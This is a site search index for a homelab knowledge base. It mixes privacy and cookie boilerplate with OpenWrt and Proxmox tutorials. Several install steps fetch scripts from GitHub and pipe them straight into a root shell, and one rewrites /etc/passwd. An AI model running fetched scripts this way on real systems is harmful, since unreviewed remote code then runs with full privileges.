Synology DS218+ NAS. 2x SAMSUNG 870 QVO 4TB SSD. Noctua NF-A9 FLX Fan. SABRENT USB 5GbE Ethernet. 2x Crucial 4GB DDR3l-1600. Used for
Data backup. Data synchronization. Data storage. Docker containers.
", "tags": ["HomeLab", "Synology", "NAS"]}, {"location": "information/affiliateDisclosure/", "title": "Affiliate Disclosure", "text": "This website can include advertising, supported content, paid inserts, affiliate links or other types of monetization.
We believe in the authenticity of relationships, views and identities. Compensation received can have an effect on the advertisement material, topics or posts made in this blog. Such content, advertising space or post will be specifically marked as paid or supported content. We will only endorse the products or services that we believe, based on our expertise, are worthy of this endorsement.
Any claim, statistic, quotation or other representation of a product or service should be verified with the manufacturer or supplier. This site does not contain any content that may constitute a conflict of interest.
This website does not provide any representations, warranties or assurances as to the accuracy,
currency or completeness of the content contained on this website or on any website linked to or from this website.
", "tags": ["information", "affiliate"]}, {"location": "information/affiliateDisclosure/#participant-programs", "title": "Participant Programs\u200b", "text": "This website is a participant in the Amazon Services LLC Associates Program, aliexpress, an affiliate advertisement program designed to provide a way for websites to receive advertising fees through advertising and links to amazon.com, aliexpress.com.
", "tags": ["information", "affiliate"]}, {"location": "information/cookies-policy/", "title": "Cookies Policy", "text": "We use cookies and other similar technologies to help provide our Services, to advertise to you and to analyse how you use our Services and whether advertisements are being viewed. We also allow third parties to use tracking technologies for similar purposes. If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. The Help menu on the menu bar of most browsers also tells you how to prevent your browser from accepting new cookies, how to delete old cookies, how to have the browser notify you when you receive a new cookie and how to disable cookies altogether.
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#what-are-cookies", "title": "What are Cookies?", "text": "A cookie is a small text file which is sent to your computer or mobile device (referred to in this policy as a \u201cdevice\u201d) by the web server so that the website can remember some information about your browsing activity on the website. The cookie will collect information relating to your use of our sites, information about your device such as the device\u2019s IP address and browser type, demographic data and, if you arrived at our site via a link from third party site, the URL of the linking page. If you are a registered user or subscriber it may also collect your name and email address, which may be transferred to data processors for registered user or subscriber verification purposes. Cookies record information about your online preferences and help us to tailor our websites to your interests. Information provided by cookies can help us to analyse your use of our sites and help us to provide you with a better user experience. We use tracking technologies for the following purposes:
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#performance-purposes", "title": "Performance Purposes", "text": "These cookies are necessary for the website to function and cannot be switched off in our systems. These are used to let you login, to ensure site security and to provide shopping cart functionality. Without this type of technology, our Services won\u2019t work properly or won\u2019t be able to provide certain features and functionalities.
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#personalization-cookies", "title": "Personalization Cookies", "text": "These cookies are used to analyze how visitors use a website, for instance which pages visitors visit most often, in order to provide a better user experience. We also use this technology to check if you have opened our emails, so we can see if they are being delivered correctly and are of interest.
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#advertising-cookies", "title": "Advertising Cookies", "text": "These cookies are used to limit the number of times you see an advertisement, or to customize advertising across our Services and make it more relevant to you and to allow us to measure the effectiveness of advertising campaigns and track whether ads have been properly displayed so we can pay for this. You have the option to change your choices relating to cookies utilized to deliver behaviorally targeted advertising here for EU \u201cAdvertising cookies\u201d and here for US Advertising cookies.
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#social-media-cookies", "title": "Social Media Cookies", "text": "Cookies are used by social media services to enable you to share our content with your friends and networks. These cookies may track your browser across other sites and build a profile of your interests, which may impact the content and messages you see on other websites that you visit.
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#google-analytics", "title": "Google Analytics", "text": "We use Google Analytics for aggregated, anonymized website traffic analysis. In order to track your session usage, Google drops a cookie (_ga) with a randomly-generated ClientID in your browser. This ID is anonymized and contains no identifiable information like email, phone number, name, etc. We also send Google your IP Address. We use GA to track aggregated website behavior, such as what pages you looked at, for how long, and so on. This information is important to us for improving the user experience and determining site effectiveness. If you would like to access what browsing information we have \u2013 or ask us to delete any GA data \u2013 please delete your _ga cookies, reach out to us via this form, and/or install the Google Analytics Opt-Out Browser Add-On.
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#how-to-manage-remove-cookies", "title": "How to manage & remove cookies", "text": "If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. The Help menu on the menu bar of most browsers also tells you how to prevent your browser from accepting new cookies, how to delete old cookies, how to have the browser notify you when you receive a new cookie and how to disable cookies altogether. You can also visit https://www.aboutcookies.org for more information on how to manage and remove cookies across a number of different internet browsers. You also have the option to change your choices relating to cookies utilized to deliver behaviorally targeted advertising here for EU \u201cAdvertising cookies\u201d and here for US Advertising cookies. If you would like to contact us about cookies please our online feedback form or our contact page.
", "tags": ["information", "Cookies"]}, {"location": "information/endorsement/", "title": "Website Endorsements", "text": "Website endorsement for our partners and friends who support our mission.
", "tags": ["information", "endorsements"]}, {"location": "information/endorsement/#adventureapp", "title": "adventure.app", "text": "Adventure is an app that provides you with a simple and intuitive interface to plan your trip. You can choose from a wide range of activities and destinations. We also provide you with a recommendation system that will help you choose the best activity for you. Visit adventure.app!
", "tags": ["information", "endorsements"]}, {"location": "information/license/", "title": "License", "text": "", "tags": ["information", "license"]}, {"location": "information/license/#mit-license", "title": "MIT License", "text": "Copyright\u00a9 3os.org 2022
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
", "tags": ["information", "license"]}, {"location": "information/portfolio/", "title": "Stas Yakobov's Portfolio", "text": "Stas Yakobov aka fire1ce \u2022 I'm security researcher - specialized in hardware pentetrations tests
\u2022 I like experimenting with technologies, building small projects, automate everything.
\u2022 Passionate about security, linux, dockers, electronics(IoT), coding, open-source and knowledge
\u2022 I'm the owner and the maintener of a 3os.org knowledge-base website
How To Reach Me
", "tags": ["portfolio", "resume"]}, {"location": "information/privacy-policy/", "title": "Privacy Policy", "text": "Your privacy is very important to us. Accordingly, we have developed this policy in order for you to understand how we collect, use, communicate and make use of personal information. The following outlines our privacy policy.
When accessing this website, will learn certain information about you during your visit.
Similar to other commercial websites, our website utilizes a standard technology called \u2018cookies\u2019 (see explanation below) and server logs to collect information about how our site is used. Information gathered through cookies and server logs may include the date and time of visits, the pages viewed, time spent at our site, and the websites visited just before and just after our own, as well as your IP address.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#use-of-cookie", "title": "Use of Cookie", "text": "A cookie is a very small text document, which often includes an anonymous unique identifier. When you visit a website, that site\u2019s computer asks your computer for permission to store this file in a part of your hard drive specifically designated for cookies. Each website can send its own cookie to your browser if your browser\u2019s preferences allow it, but (to protect your privacy) your browser only permits a website to access the cookies it has already sent to you, not the cookies sent to you by other sites.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#ip-addresses", "title": "IP Addresses", "text": "IP addresses are used by your computer every time you are connected to the Internet. Your IP address is a number that is used by computers on the network to identify your computer. IP addresses are automatically collected by our web server as part of demographic and profile data known as \u201ctraffic data\u201d so that data (such as the Web pages you request) can be sent to you.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#email-information", "title": "Email Information", "text": "If you choose to correspond with us through email, we may retain the content of your email messages together with your email address and our responses. We provide the same protections for these electronic communications that we employ in the maintenance of information received online, mail and telephone. This also applies when you register for our website, sign up through any of our forms using your email address or make a purchase on this site. For further information see the email policies below.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#how-do-we-use-the-information-that-you-provide-to-us", "title": "How Do We Use The Information That You Provide To Us?", "text": "Broadly speaking, we use personal information for purposes of administering our business activities, providing customer service and making available other items and services to our customers and prospective customers.
will not obtain personally-identifying information about you when you visit our site, unless you choose to provide such information to us, nor will such information be sold or otherwise transferred to unaffiliated third parties without the approval of the user at the time of collection.
We may disclose information when legally compelled to do so, in other words, when we, in good faith, believe that the law requires it or for the protection of our legal rights.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#email-policies", "title": "Email Policies", "text": "We are committed to keeping your e-mail address confidential. We do not sell, rent, or lease our subscription lists to third parties, and we will not provide your personal information to any third party individual, government agency, or company at any time unless strictly compelled to do so by law.
We will use your e-mail address solely to provide timely information about .
We will maintain the information you send via e-mail in accordance with applicable federal law.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#can-spam-compliance", "title": "CAN-SPAM Compliance", "text": "In compliance with the CAN-SPAM Act, all e-mail sent from our organization will clearly state who the e-mail is from and provide clear information on how to contact the sender. In addition, all e-mail messages will also contain concise information on how to remove yourself from our mailing list so that you receive no further e-mail communication from us.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#choiceopt-out", "title": "Choice/Opt-Out", "text": "Our site provides users the opportunity to opt-out of receiving communications from us and our partners by reading the unsubscribe instructions located at the bottom of any e-mail they receive from us at anytime.
Users who no longer wish to receive our newsletter or promotional materials may opt-out of receiving these communications by clicking on the unsubscribe link in the e-mail.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#use-of-external-links", "title": "Use of External Links", "text": "This website may contain links to many other websites. cannot guarantee the accuracy of information found at any linked site. Links to or from external sites not owned or controlled by do not constitute an endorsement by or any of its employees of the sponsors of these sites or the products or information presented therein.
By accessing this web site, you are agreeing to be bound by these web site Terms and Conditions of Use, all applicable laws and regulations, and agree that you are responsible for compliance with any applicable local laws. If you do not agree with any of these terms, you are prohibited from using or accessing this site. The materials contained in this web site are protected by applicable copyright and trade mark law.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#acceptable-use", "title": "Acceptable Use", "text": "You agree to use our website only for lawful purposes, and in a way that does not infringe the rights of, restrict or inhibit anyone else\u2019s use and enjoyment of the website. Prohibited behavior includes harassing or causing distress or inconvenience to any other user, transmitting obscene or offensive content or disrupting the normal flow of dialogue within our website.
You must not use our website to send unsolicited commercial communications. You must not use the content on our website for any marketing related purpose without our express written consent.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#restricted-access", "title": "Restricted Access", "text": "We may in the future need to restrict access to parts (or all) of our website and reserve full rights to do so. If, at any point, we provide you with a username and password for you to access restricted areas of our website, you must ensure that both your username and password are kept confidential.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#use-of-testimonials", "title": "Use of Testimonials", "text": "In accordance to with the FTC guidelines concerning the use of endorsements and testimonials in advertising, please be aware of the following:
Testimonials that appear on this site are actually received via text, audio or video submission. They are individual experiences, reflecting real life experiences of those who have used our products and/or services in some way. They are individual results and results do vary. We do not claim that they are typical results. The testimonials are not necessarily representative of all of those who will use our products and/or services.
The testimonials displayed in any form on this site (text, audio, video or other) are reproduced verbatim, except for correction of grammatical or typing errors. Some may have been shortened. In other words, not the whole message received by the testimonial writer is displayed when it seems too lengthy or not the whole statement seems relevant for the general public.
We are not responsible for any of the opinions or comments posted on this website. This website is not a forum for testimonials, however provides testimonials as a means for customers to share their experiences with one another. To protect against abuse, all testimonials appear after they have been reviewed by the management . We not share the opinions, views or commentary of any testimonials on this website \u2013 the opinions are strictly the views of the testimonial source.
The testimonials are never intended to make claims that our products and/or services can be used to diagnose, treat, cure, mitigate or prevent any disease. Any such claims, implicit or explicit, in any shape or form, have not been clinically tested or evaluated.
How Do We Protect Your Information And Secure Information Transmissions?
Email is not recognized as a secure medium of communication. For this reason, we request that you do not send private information to us by email. However, doing so is allowed, but at your own risk. Some of the information you may enter on our website may be transmitted securely via a secure medium known as Secure Sockets Layer, or SSL. Credit Card information and other sensitive information is never transmitted via email.
We may use software programs to create summary statistics, which are used for such purposes as assessing the number of visitors to the different sections of our site, what information is of most and least interest, determining technical design specifications, and identifying system performance or problem areas.
For site security purposes and to ensure that this service remains available to all users, uses software programs to monitor network traffic to identify unauthorized attempts to upload or change information, or otherwise cause damage.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#disclaimer-and-limitation-of-liability", "title": "Disclaimer And Limitation Of Liability", "text": "We makes no representations, warranties, or assurances as to the accuracy, currency or completeness of the content contain on this website or any sites linked to this site.
All the materials on this site are provided \u2018as is\u2019 without any express or implied warranty of any kind, including warranties of merchantability, noninfringement of intellectual property or fitness for any particular purpose. In no event shall or its agents or associates be liable for any damages whatsoever (including, without limitation, damages for loss of profits, business interruption, loss of information, injury or death) arising out of the use of or inability to use the materials, even if has been advised of the possibility of such loss or damages.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#policy-changes", "title": "Policy Changes", "text": "We reserve the right to amend this privacy policy at any time with or without notice. However, please be assured that if the privacy policy changes in the future, we will not use the personal information you have submitted to us under this privacy policy in a manner that is materially inconsistent with this privacy policy, without your prior consent.
We are committed to conducting our business in accordance with these principles in order to ensure that the confidentiality of personal information is protected and maintained.
", "tags": ["information", "privacy policy"]}, {"location": "infrastructure/openwrt/disable-ipv6/", "title": "OpenWrt Disable IPV6", "text": "The following steps will disable IPV6 on your OpenWrt router . All the steps are performed via the command line. You can performe them in the console of the router but the preferred way is via SSH.
Follow the following steps to disable IPV6 on your OpenWrt router:
uci set 'network.lan.ipv6=0'\nuci set 'network.wan.ipv6=0'\nuci set 'dhcp.lan.dhcpv6=disabled'\n/etc/init.d/odhcpd disable\nuci commit\n
Disable RA and DHCPv6 so no IPv6 IPs are handed out:
uci -q delete dhcp.lan.dhcpv6\nuci -q delete dhcp.lan.ra\nuci commit dhcp\n/etc/init.d/odhcpd restart\n
You can now disable the LAN delegation:
uci set network.lan.delegate=\"0\"\nuci commit network\n/etc/init.d/network restart\n
You might as well disable odhcpd:
/etc/init.d/odhcpd disable\n/etc/init.d/odhcpd stop\n
And finally you can delete the IPv6 ULA Prefix:
uci -q delete network.globals.ula_prefix\nuci commit network\n/etc/init.d/network restart\n
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/install-oh-my-zsh/", "title": "Install oh-my-zsh on OpenWrt", "text": "You can install oh-my-zsh on OpenWrt, make sure to use the Prevent User Lockout
option since many users been locked out of their sessions since the zsh
shell was not installed or loaded properly.
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/install-oh-my-zsh/#whats-zsh", "title": "Whats' ZSH", "text": "Z-shell (Zsh) configuration. is a Unix shell that can be used as an interactive login shell and as a shell scripting command interpreter. Zsh is an enhanced Bourne shell with many enhancements, including some Bash, ksh and tcsh features.
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/install-oh-my-zsh/#whats-oh-my-zsh", "title": "What's Oh-My-Zsh", "text": "Oh My Zsh is an open source, community-driven framework for managing your zsh configuration.
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/install-oh-my-zsh/#installation-of-oh-my-zsh", "title": "Installation of oh-my-zsh", "text": "Install Requirements Packages
opkg update && opkg install ca-certificates zsh curl git-http\n
Install oh-my-zsh
sh -c \"$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)\"\n
Set zsh as default (thanks to @mlouielu)
which zsh && sed -i -- 's:/bin/ash:'`which zsh`':g' /etc/passwd\n
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/install-oh-my-zsh/#prevent-user-lockout", "title": "Prevent User Lockout", "text": "To prevent lock-outs after accidentially removing zsh (thanks to @fox34) (as explained in the wiki you can add a check for zsh
and fallback to ash
in /etc/rc.local
:
# Revert root shell to ash if zsh is not available\nif grep -q '^root:.*:/usr/bin/zsh$' /etc/passwd && [ ! -x /usr/bin/zsh ]; then\n# zsh is root shell, but zsh was not found or not executable: revert to default ash\n[ -x /usr/bin/logger ] && /usr/bin/logger -s \"Reverting root shell to ash, as zsh was not found on the system\"\nsed -i -- 's:/usr/bin/zsh:/bin/ash:g' /etc/passwd\nfi\n
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/snippets/", "title": "Snippets and Tips", "text": "OpenWrt Snippets with useful commands and scripts. Best practices and tips.
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/snippets/#update-all-packages-on-openwrt-from-ssh", "title": "Update all packages on OpenWrt from SSH", "text": "opkg update && opkg list-upgradable | cut -f 1 -d ' ' | xargs opkg upgrade\n
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/snippets/#enable-luci-https-redirect-from-http", "title": "Enable LuCI HTTPS redirect from HTTP", "text": "This will activate the HTTPS redirect from HTTP in LuCI.
uci set uhttpd.main.redirect_https=1\nuci commit uhttpd\nservice uhttpd reload\n
", "tags": ["template", "markdown"]}, {"location": "infrastructure/proxmox/cloud-image-template/", "title": "Proxmox Cloud Image Template", "text": "", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#about-cloud-images", "title": "About Cloud Images", "text": "Cloud images are operating system templates and every instance starts out as an identical clone of every other instance. It is the user data that gives every cloud instance its personality and cloud-init is the tool that applies user data to your instances automatically.
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#advantage-of-cloud-image-template", "title": "Advantage of Cloud Image Template", "text": " Predefined SSH keys Predefined user account Predefined network configuration VM creation time is under few minutes No installation process required like with ISO images First boot always updated with latest updates ", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#ubuntu-cloud-images", "title": "Ubuntu Cloud Images", "text": "Ubuntu provides official cloud images you can find the proper image for your needs at cloud-images.ubuntu.com.
In this tutorial we will be using Ubuntu Server 22.04 LTS Jammy Jellyfish
cloud image.
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#create-cloud-image-template", "title": "Create Cloud Image Template", "text": "SSH to you Proxmox server.
Download the cloud image template from the official website.
wget https://cloud-images.ubuntu.com/jammy/current/jammy-server-cloudimg-amd64.img\n
In order to create a cloud image template first of all we need to create a new VM
. After we will configure it we will create a Template
from it.
The following parameters will predefine our Base Template
Command parameters description:
9000: VM ID in Proxmox. I prefer to use high number for management purposes. memory: VM's memory in MB. core: Number of CPU cores for the VM. name: Name of the VM and the template. net0: Network interface for the VM. bridge: Network bridge for the VM. agent: Enable or disable QEMU agent support. onboot: Enable or disable VM start on boot. Create a new virtual machine.
qm create 9000 --memory 2048 --core 2 --name ubuntu-22.04-cloud --net0 virtio,bridge=vmbr0 --agent enabled=1 --onboot 1\n
The default storage Proxmox creates for vm is storage1. In my case I use different storage for vm's and templates named storage1. The following commands will utilize the storage1 storage. Change the storage name for your Proxmox server.
Import the downloaded Ubuntu Cloud Image
we downloaded before disk to the storage.
qm importdisk 9000 jammy-server-cloudimg-amd64.img storage1\n
Attach the new disk to the vm as a scsi
drive on the scsi
controller
qm set 9000 --scsihw virtio-scsi-pci --scsi0 storage1:vm-9000-disk-0\n
Add cloud init drive
qm set 9000 --ide2 storage1:cloudinit\n
Make the cloud init drive bootable and restrict BIOS to boot from disk only
qm set 9000 --boot c --bootdisk scsi0\n
Add serial console
qm set 9000 --serial0 socket --vga serial0\n
WARNING: DO NOT START THE VM
Powering on the vm will create a unique ID that will presist with the template. We want to avoid this.
Now had to the Proxmox web interface. Select the new vm and Cloud-Init
tab.
Configure the default setting for the cloud image template. This will allow the VM to start with predefined user, password, ssh keys and network configuration.
At this point we configured the VM and we can create a cloud image template from it.
Create a new cloud image template.
qm template 9000\n
Now you can use the Cloud Image Template to create new vm instances. You can do it from the Proxmox web interface or from the command line.
Tip
Use Full Clone when creating a new VM from a cloud image template. Linked Clone will privent you from deleting the cloud image template.
Cli example:
qm clone 9000 122 --name my-new-vm --full\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#vms-storage", "title": "VM's Storage", "text": "Since we are using a minimal cloud image template. Cloned VM's will use the same storage as the template which is about 2GB of disk space.
You can utilize an automated script to to expand the disk space of the cloned VM: VM Disk Expander
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#troubleshooting", "title": "Troubleshooting", "text": "", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#reseting-vms-machine-id", "title": "Reseting VM's machine-id
", "text": "Run the following command inside the VM to reset the machine-id.
sudo rm -f /etc/machine-id\nsudo rm -f /var/lib/dbus/machine-id\n
Shutdown the VM. Then power it back on. The machine-id will be regenerated.
If the machine-id is not regenerated you can try to fix it by running the following command.
sudo systemd-machine-id-setup\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/lets-encrypt-cloudflare/", "title": "Proxmox Valid SSL With Let's Encrypt and Cloudflare DNS", "text": "This is a guide to how to setup a valid SSL certificate with Let's Encrypt and Cloudflare DNS
for Proxmox VE
. Let's Encrypt will allow you to obtain a valid SSL certificate for your Proxmox VE Server for free for 90 days. In the following steps, we will setup a valid SSL certificate for your Proxmox VE Server using Let's Encrypt and Cloudflare DNS Challenge. The process of renewing the certificate is done automatically by Proxmox VE Server and you do not need to do anything manually to renew the certificate.
", "tags": ["proxmox", "cloudflare", "letsencrypt"]}, {"location": "infrastructure/proxmox/lets-encrypt-cloudflare/#prerequarements", "title": "Prerequarements", "text": " Exisiting DNS record for the domain name you want to use for Proxmox VE. Cloudflare DNS Zone API Access Token. Cloudflare DNS Zone ID. I won't be covcovering the process of creating the Zone API Tokens at this guide. You can find more information about this process here.
", "tags": ["proxmox", "cloudflare", "letsencrypt"]}, {"location": "infrastructure/proxmox/lets-encrypt-cloudflare/#instalaion-and-configuration", "title": "Instalaion and Configuration", "text": "The process will be done fully in Proxmox web interface. Login to the Proxmox web interface select Datacenter
, find ACME
and click on it.
At Account
section, click Add. Fill the Account Name
and E-Mail
. Accept the Terms and Conditions (TOC). Click Register
. This will register an account for Let's Encrypt service in order to obtain a certificate.
The output should be something like this:
At Challenge Plugin
ection, click Add. Fill the Plugin ID
(name), at DNS API
choose Cloudflare Managed DNS
. CF_Token=
and CF_Zone_ID=
are the API Tokens and Zone ID for Cloudflare DNS - leave the rest empty.
The final screen should look like this:
Select the Pve Server
in my case its name proxmox
, under System
select Certificates
.
At ACME
section, click Edit
and select the Account
we created earlier.
Click Add
, select Challenge Type
DNS
and Challenge Plugin
the plugin we created earlier. Domain
is the domain name we want to use for the certificate. Click Create
.
Now its time to issue the certificate. Click Order Certificate Now
.
At this point Proxmox will try to issue the certificate from Let's Encrypt and validate it with Cloudflare DNS Challenge.
If all goes well, you will see the following:
Now the certificate is installed and ready to use. The renewal process is done automatically by Proxmox VE Server.
", "tags": ["proxmox", "cloudflare", "letsencrypt"]}, {"location": "infrastructure/proxmox/pvekclean/", "title": "PVE Kernel Cleaner", "text": "Easily remove old/unused PVE kernels on your Proxmox VE system
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#developers", "title": "Developers", "text": " Jordan Hillis - Lead Developer The original pvekclean github page
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#what-is-pve-kernel-cleaner", "title": "What is PVE Kernel Cleaner?", "text": "PVE Kernel Cleaner is a program to compliment Proxmox Virtual Environment which is an open-source server virtualization environment. PVE Kernel Cleaner allows you to purge old/unused kernels filling the /boot directory. As new kernels are released the older ones have to be manually removed frequently to make room for newer ones. This can become quite tedious and require extensive time spent monitoring the system when new kernels are released and when older ones need to be cleared out to make room. With this issue existing, PVE Kernel Cleaner was created to solve it.
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#features", "title": "Features", "text": " Removes old PVE kernels from your system Ability to schedule PVE kernels to automatically be removed on a daily/weekly/monthly basis Run a simple pvekclean command for ease of access Checks health of boot disk based on space available Debug mode for non-destructive testing Update function to easily update the program to the latest version Allows you to specify the minimum number of most recent PVE kernels to retain Support for the latest Proxmox versions and PVE kernels ", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#prerequisites", "title": "Prerequisites", "text": "Before using this program you will need to have the following packages installed. * cron * curl * git
To install all required packages enter the following command.
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#debian", "title": "Debian:", "text": "sudo apt-get install cron curl git\n
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#installing", "title": "Installing", "text": "You can install PVE Kernel Cleaner using either Git or Curl. Choose the method that suits you best:
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#installation-via-git", "title": "Installation via Git", "text": " Open your terminal.
Enter the following commands one by one to install PVE Kernel Cleaner:
git clone https://github.com/jordanhillis/pvekclean.git\ncd pvekclean\nchmod +x pvekclean.sh\n./pvekclean.sh\n
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#installation-via-curl", "title": "Installation via Curl", "text": " Open your terminal.
Use the following command to install PVE Kernel Cleaner:
curl -o pvekclean.sh https://raw.githubusercontent.com/jordanhillis/pvekclean/master/pvekclean.sh\nchmod +x pvekclean.sh\n./pvekclean.sh\n
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#updating", "title": "Updating", "text": "PVE Kernel Cleaner checks for updates automatically when you run it. If an update is available, you'll be notified within the program. Simply follow the on-screen instructions to install the update, and you're all set with the latest version!
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#usage", "title": "Usage", "text": "Example of usage:
pvekclean [OPTION1] [OPTION2]...\n\n-k, --keep [number] Keep the specified number of most recent PVE kernels on the system\n Can be used with -f or --force for non-interactive removal\n-f, --force Force the removal of old PVE kernels without confirm prompts\n-rn, --remove-newer Remove kernels that are newer than the currently running kernel\n-s, --scheduler Have old PVE kernels removed on a scheduled basis\n-v, --version Shows current version of pvekclean\n-r, --remove Uninstall pvekclean from the system\n-i, --install Install pvekclean to the system\n-d, --dry-run Run the program in dry run mode for testing without making system changes\n
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/vm-disk-expander/", "title": "Proxmox Virtual Machine Disk Expander", "text": "Github Repository: Proxmox vm disk expander
Interactive disk expander for Proxmox's VM disks (including the partition) from your Proxmox host cli.
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/vm-disk-expander/#curl-method", "title": "Curl Method", "text": "Run the script once, without installing it.
bash <(curl -s https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/expand.sh)\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/vm-disk-expander/#installer", "title": "Installer", "text": "Install the script at Proxmox host for multiple use.
Run the following command from Proxmox host:
curl -sS https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/install.sh | bash\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/vm-disk-expander/#usage", "title": "Usage", "text": "expand-disk\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/vm-disk-expander/#update", "title": "Update", "text": "Same as the installer.
curl -sS https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/install.sh | bash\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/vm-disk-expander/#example-usageoutput", "title": "Example usage/output", "text": "\u256d\u2500root@proxmox ~\n\u2570\u2500# bash <(curl -s https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/expand.sh) 1 \u21b5\n VMID NAME STATUS MEM(MB) BOOTDISK(GB) PID\n 100 vm100 running 4096 40.20 1113\n101 test stopped 2048 2.20 0\n9000 ubuntu22-04-cloud stopped 2048 2.20 0\nEnter the VM ID to be expanded: 101\nEnter the size to be expanded in GB (example: 10G): 5G\nVM ID 101 disk storage1 will be expanded by 5G\nWarning: There is currently no way to downsize the disk!\nAre you sure you want to expand the disk? (yes/no): yes\n\nExpanding the disk... Size of logical volume storage1/vm-101-disk-0 changed from <2.20 GiB (563 extents) to <7.20 GiB (1843 extents).\n Logical volume storage1/vm-101-disk-0 successfully resized.\nGPT:Primary header thinks Alt. header is not at the end of the disk.\nGPT:Alternate GPT header not at the end of the disk.\nGPT: Use GNU Parted to correct GPT errors.\nadd map storage1-vm--101--disk--0p1 (253:12): 0 4384735 linear 253:11 227328\nadd map storage1-vm--101--disk--0p14 (253:13): 0 8192 linear 253:11 2048\nadd map storage1-vm--101--disk--0p15 (253:14): 0 217088 linear 253:11 10240\nWarning: The kernel is still using the old partition table.\nThe new table will be used at the next reboot or after you\nrun partprobe(8) or kpartx(8)\nThe operation has completed successfully.\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/vm-disk-expander/#limitations", "title": "Limitations", "text": " VM must be stopped to expand the disk. Currently supported only \"cloud images\" (or single ext4 partition installation) but if you still want to resize regular vm with LVM partition table, you need to extend the LVM partition INSIDE the vm AFTER running the script. Resizing LVM is done like this: $ lvm\n\nlvm> lvextend -l +100%FREE /dev/ubuntu-vg/ubuntu-lv\nlvm> exit\n\n$ resize2fs /dev/ubuntu-vg/ubuntu-lv\n
